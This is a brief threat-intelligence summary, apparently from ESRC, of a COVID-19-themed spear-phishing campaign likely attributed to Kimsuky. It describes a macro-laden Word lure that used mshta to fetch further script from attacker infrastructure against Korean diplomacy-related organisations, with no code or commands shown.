ESRC reports a Korean-language COVID-19 lure attributed as likely Kimsuky activity and analyzed as part of the group's SmokeScreen campaign. The spear-phishing targeted an international exchange and diplomacy-related organization with a malicious Word document named “Coronavirus response.doc” that prompted the recipient to enable macros. If enabled, the macro displayed plausible COVID-19 meeting content while using mshta to contact attacker-controlled infrastructure hosted on a domestic service and retrieve additional script content beginning with search.hta. The activity matters because it adapted pandemic anxiety and increased remote-work email exposure into a localized spear-phishing chain aimed at Korean organizations.